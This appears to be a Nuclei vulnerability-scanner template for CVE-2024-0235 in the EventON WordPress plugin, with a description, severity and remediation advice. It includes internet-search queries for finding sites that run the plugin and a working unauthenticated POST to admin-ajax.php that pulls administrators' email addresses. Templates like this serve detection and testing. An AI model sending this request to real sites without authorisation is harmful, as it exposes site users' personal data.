id: CVE-2024-0235 info: name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure author: princechaddha severity: medium description: | The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog. impact: | An attacker could potentially access sensitive email information. remediation: | Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235. reference: - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/ - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2024-0235 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-0235 cwe-id: CWE-862 epss-score: 0.00052 epss-percentile: 0.19233 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: myeventon product: eventon framework: wordpress shodan-query: - "vuln:CVE-2023-2796" - http.html:/wp-content/plugins/eventon-lite/ - http.html:/wp-content/plugins/eventon/ fofa-query: - "wp-content/plugins/eventon/" - body=/wp-content/plugins/eventon/ - body=/wp-content/plugins/eventon-lite/ publicwww-query: - "/wp-content/plugins/eventon/" - /wp-content/plugins/eventon-lite/ google-query: "inurl:\"/wp-content/plugins/eventon/\"" tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon http: - method: POST path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users" headers: Content-Type: application/x-www-form-urlencoded body: "_user_role=administrator" matchers-condition: and matchers: - type: word part: body words: - '@' - 'status":"good' - 'value=' - '"content":' condition: and - type: status status: - 200 # digest: 4a0a00473045022100c9b0ad3fa93a5b4f9da91f43f446ebcbfebcc8b5ff4204c82656319ba2919c62022027c3257667f4775e2b409d1e8290be69f98cff8f6eaea854344451cd25dfd327:922c64590222798bb761d5b6d8e72950